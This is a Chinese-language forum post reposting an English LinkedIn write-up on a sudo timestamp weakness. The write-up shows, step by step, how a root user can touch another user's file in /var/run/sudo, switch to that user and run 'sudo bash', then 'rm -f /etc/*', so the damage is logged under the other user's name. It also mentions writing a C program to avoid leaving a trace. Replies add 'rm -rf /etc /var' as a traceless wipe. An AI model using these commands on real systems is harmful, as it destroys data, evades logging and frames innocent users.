简体中文
繁体中文  
首页 军事论坛 即时新闻 热点新闻 图片新闻 中国军情 国际军事 军事评论 兵器知识 史海钩沉 世界体育 户外活动 时事新闻 军事文学
 
版主:黑木崖
 · 九阳全新免清洗型豆浆机 全美最低
 		 
为何您不该在关键UNIX/Linux系统上使用sudo
送交者:  2017年11月24日03:26:58 于 [世界军事论坛] 发送悄悄话

以下是本人在Linkedin发的一个帖子:

I know sudo has many security issues along the years, and this is just one problem that's bad enough.
Here is the example attacker could use it to do bad things:
On one window:
root@analy:/$ tty
/dev/pts/1
root@analy:~$ su  wgong
wgong@analy:/$

On another window:
root@analy:sudo$ pwd
/var/run/sudo
root@analy:sudo$ ls
_pam_timestamp_key caburiar davidn gagans jawadk nickc ponnusva sohenoor veeral zhoub
amirm chaumong eladn gambhisr jeesuna oswaldod qualys-scan sysadmin warrene
badris couttsa feroza gawalis jeffc pavlenkoi root taddm wgong
bobv covim forrestl greeffn minaa pomfretj silvae tothp zhens
root@analy:sudo$ touch wgong/1

Then on 1st window,
wgong@analy:/$ sudo bash
root@analy:/# rm -f /etc/*

Of course, you need to develop a simple C program to do the equivalent thing "su wgong" does to avoid being logged.
0%(0)
0%(0)
  请注意,当wgong用户运行sudo时, - ausec 11/24/17 (641)
    第一,超级用户想搞破坏还需这么麻烦?第二,sodo -v - 敌营十八年 11/24/17 (730)
      回答 - ausec 11/24/17 (663)
        cd / && rm -rf /etc /var 不露痕迹。  /无内容 - 敌营十八年 11/24/17 (571)
          将/var删除会破坏这种攻击嫁祸于人的目的 - ausec 11/24/17 (584)
标 题 (必选项):
内 容 (选填项):
实用资讯
北美最大最全的折扣机票网站
美国名厂保健品一级代理,花旗参,维他命,鱼油,卵磷脂,30天退货保证.买百免邮.
一周点击热帖 更多>>
一周回复热帖
历史上的今天:回复热帖
2016: 中国第一次没收新加坡的军用设备:做掉
2016: 彭丽媛舅告别式》采访侧记-盐商之子变
2015: 这新闻,简单的过分了 (图)
2015: 土耳其在边境地区击落入侵战机 俄国防部
2014: 永暑岛就地取土能填多大?
2014: 创立中国人自己的宗教,抗衡西方的各种
2013: 陸劃防空識別區 美国务院、白宫和五角大
2013: BBC: 日本“严重抗议”中国设东海防空识
2012: 军报:首批5名飞行员驾歼15完成在航母起
2012: 官方J15起降航母高清照片出炉了!!!
广告服务 联系我们 关于我们 网站导航 隐私保护
Jobs. Contact us. Privacy Policy. Copyright (C) 1998-2024. Wforum.COM. All Rights Reserved.